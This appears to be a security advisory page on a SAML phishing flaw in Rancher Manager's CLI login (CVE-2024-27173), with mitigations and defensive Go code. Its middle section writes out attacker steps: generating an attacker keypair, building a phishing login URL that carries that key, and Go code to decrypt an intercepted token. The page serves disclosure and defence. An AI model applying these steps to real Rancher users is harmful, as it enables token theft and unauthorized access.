Rancher Manager, SAML Authentication Phishing, CVE-2024-27173 (Critical)

The vulnerability lies in the SAML authentication flow between Rancher Manager and the Rancher CLI. When a user initiates a login via the CLI, the tool generates a requestId and a publicKey, then provides a URL to complete authentication in a browser. An attacker can craft a malicious phishing URL carrying their own controlled publicKey and requestId. If a victim is tricked into using this URL, the SAML authentication process completes normally from the user’s perspective. However, the resulting Rancher authentication token is encrypted with the attacker’s public key. The attacker, who holds the corresponding private key, can decrypt the intercepted token and gain unauthorized access with the victim’s privileges within Rancher. This attack bypasses typical phishing detection because the login page itself is legitimate.
Platform: Rancher Manager
Version: < v2.12.2, < v2.11.6, < v2.10.10, < v2.9.12
Vulnerability: SAML Auth Phishing
Severity: Critical

date: 2024

Prediction: Patch Available

What Undercode Say:

# Victim side: the CLI starts a browser-based login and prints a URL carrying its own requestId and publicKey
rancher login https://rancher.example.com --token
# Attacker generates a keypair
openssl genrsa -out attacker_priv.pem 2048
openssl rsa -in attacker_priv.pem -pubout -out attacker_pub.pem
# Malicious URL structure (attacker's requestId and publicKey substituted for the CLI's)
https://rancher.example.com/dashboard/auth/login?requestId=attacker-controlled-id&publicKey=$(cat attacker_pub.pem | base64 -w 0)&responseType=saml
// Example decryption logic (attacker side), Go; needs crypto/rand, crypto/rsa, crypto/sha256 and encoding/base64
// interceptedToken is the base64 token returned by the login flow; privateKey is the *rsa.PrivateKey matching attacker_pub.pem
ciphertext, err := base64.StdEncoding.DecodeString(interceptedToken)
plaintext, err := rsa.DecryptOAEP(sha256.New(), rand.Reader, privateKey, ciphertext, nil)

How the exploit works:

Phishing URL crafted.

Victim authenticates via URL.

Token encrypted with attacker’s key.

Attacker decrypts token.

Protection from this CVE

Update Rancher Manager.

Verify that the requestId (and publicKey) in the login URL match the ones the CLI generated for the pending login.

User awareness training.
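To show what the "verify CLI requestId match" mitigation buys, here is an added Go model of the CLI side of the flow (illustrative code written for this page, not the Rancher CLI's or Rancher Manager's own implementation). It assumes the token is RSA-OAEP encrypted to the advertised publicKey, as the page describes; newLogin, encryptToken and acceptToken are hypothetical names.

```go
package main

import (
	"crypto/rand"
	"crypto/rsa"
	"crypto/sha256"
	"crypto/subtle"
	"encoding/base64"
	"errors"
)

// pendingLogin is the state the CLI keeps for one browser-login attempt:
// the requestId it issued and the private half of the keypair it advertised.
type pendingLogin struct {
	requestID string
	key       *rsa.PrivateKey
}

// newLogin generates a fresh requestId and keypair for one login attempt.
func newLogin() (*pendingLogin, error) {
	key, err := rsa.GenerateKey(rand.Reader, 2048)
	if err != nil {
		return nil, err
	}
	id := make([]byte, 16)
	if _, err := rand.Read(id); err != nil {
		return nil, err
	}
	return &pendingLogin{requestID: base64.RawURLEncoding.EncodeToString(id), key: key}, nil
}

// encryptToken stands in for the server encrypting the issued token to whatever
// publicKey arrived in the login URL (the attacker's, in the phishing case).
func encryptToken(pub *rsa.PublicKey, token string) (string, error) {
	ct, err := rsa.EncryptOAEP(sha256.New(), rand.Reader, pub, []byte(token), nil)
	return base64.StdEncoding.EncodeToString(ct), err
}

// acceptToken applies the mitigation: a response is decrypted only if its requestId
// is the one this CLI issued (constant-time compare), and only with this CLI's own key.
func (p *pendingLogin) acceptToken(requestID, b64Ciphertext string) (string, error) {
	if subtle.ConstantTimeCompare([]byte(requestID), []byte(p.requestID)) != 1 {
		return "", errors.New("requestId does not match the pending CLI login")
	}
	ct, err := base64.StdEncoding.DecodeString(b64Ciphertext)
	if err != nil {
		return "", err
	}
	// An OAEP failure here means the token was bound to a key this CLI never generated.
	pt, err := rsa.DecryptOAEP(sha256.New(), rand.Reader, p.key, ct, nil)
	return string(pt), err
}
```

A token encrypted to a foreign publicKey, or returned under a requestId the CLI never issued, is rejected instead of being silently accepted.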

Impact:

Privilege Escalation

Token Theft

Unauthorized Access

Sources:

Reported By: github.com
Extra Source Hub:
Undercode